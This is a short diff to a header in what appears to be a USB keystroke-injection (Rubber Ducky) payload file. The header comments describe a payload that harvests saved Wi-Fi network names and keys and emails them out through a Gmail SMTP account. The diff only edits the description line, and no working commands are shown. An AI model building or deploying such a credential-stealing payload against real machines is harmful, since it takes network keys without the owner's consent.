abhinavvv03/Rubber-Duckey/Payload---WiFi-key-grabber.md

 REM Author: SiemH
 REM Version: 7
 REM Description:
-REM Finds SSID, Network type, Authentication type and the network key and saves them to 'log' REM Creates SMTP server and emails the contents of 'log' using the specified Gmail account to the specified receiver.
+REM 20 second payload that finds the SSID, Network type, Authentication type and the network key and saves them to 'log' REM Creates SMTP server and emails the contents of 'log' using the specified Gmail account to the specified receiver.

 REM FASE 1: Preparation